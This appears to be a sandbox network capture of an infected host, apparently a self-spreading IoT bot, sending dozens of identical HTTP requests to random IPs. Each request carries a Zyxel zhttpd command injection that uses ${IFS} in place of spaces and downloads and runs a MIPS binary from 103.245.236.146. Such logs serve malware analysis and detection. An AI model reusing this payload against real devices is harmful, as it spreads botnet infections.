                                      Jan 19, 2024 17:29:25.637938023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2766192.168.2.145075817.194.185.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637990952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2767192.168.2.1456292159.226.198.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638035059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2768192.168.2.1455618160.151.153.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638083935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2769192.168.2.1454994135.78.24.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638111115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2770192.168.2.1437626120.15.35.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638156891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2771192.168.2.144142488.236.89.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638204098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2772192.168.2.145658836.234.23.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638245106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2773192.168.2.1453106165.173.160.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638282061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2774192.168.2.1436618181.127.151.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638309002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2775192.168.2.144807067.119.98.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638364077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2776192.168.2.143691053.174.213.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638417959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2777192.168.2.144554057.199.128.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638447046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2778192.168.2.144469876.37.174.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638499975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2779192.168.2.1444072175.45.85.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638529062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2780192.168.2.1433620109.202.238.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638573885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2781192.168.2.1441972198.1.81.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638613939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2782192.168.2.1433800142.161.187.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638633966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2783192.168.2.1439254184.96.119.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638669968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2784192.168.2.1447478102.172.209.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638710976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2785192.168.2.1448644114.91.180.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638745070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2786192.168.2.1449338203.147.5.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638782978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2787192.168.2.1451256202.68.63.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638816118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2788192.168.2.1445578138.92.190.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638847113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2789192.168.2.144172213.202.89.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638884068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2790192.168.2.144129467.84.109.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638930082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2791192.168.2.144031218.238.111.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.638952017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2792192.168.2.1446822115.45.150.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639008045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2793192.168.2.145492859.62.172.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639053106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2794192.168.2.144600620.134.171.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639081955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2795192.168.2.145988219.251.147.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639106989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2796192.168.2.145378269.162.79.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639146090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2797192.168.2.1459578161.86.25.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639206886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2798192.168.2.1454206128.172.50.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639254093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2799192.168.2.1444234139.69.78.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639292955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2800192.168.2.1433796162.208.216.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639332056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2801192.168.2.1439440221.252.33.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639353037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2802192.168.2.1450664143.161.2.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639401913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2803192.168.2.1445658146.83.208.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639442921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2804192.168.2.145843017.25.237.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639466047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2805192.168.2.1433032148.88.93.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639512062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2806192.168.2.1439442173.138.44.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639559031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2807192.168.2.1445252137.186.98.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639588118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2808192.168.2.1439656157.58.168.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639616013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2809192.168.2.1447372158.44.50.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639664888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2810192.168.2.1436190123.184.128.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639693975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2811192.168.2.1449930191.54.18.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639723063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2812192.168.2.1436018110.248.84.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639785051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2813192.168.2.1452894182.33.17.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639816999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2814192.168.2.145502282.46.155.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639844894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2815192.168.2.1455308128.22.254.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639875889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2816192.168.2.143325242.128.87.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639904976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2817192.168.2.1451328194.218.16.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.639964104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2818192.168.2.143720287.234.254.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640008926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2819192.168.2.1439412167.83.210.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640018940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2820192.168.2.143665227.126.79.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640057087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2821192.168.2.143991279.144.36.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640122890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2822192.168.2.1446662103.109.226.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640136957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2823192.168.2.1442192149.131.136.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640166044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2824192.168.2.1460462114.62.143.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640224934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2825192.168.2.1451294184.147.92.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640253067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2826192.168.2.1456674113.27.112.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640286922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2827192.168.2.1449006216.58.97.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640337944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2828192.168.2.1450312213.185.39.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640383959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2829192.168.2.1442092212.238.226.99443
                                      TimestampBytes transferredDirectionData
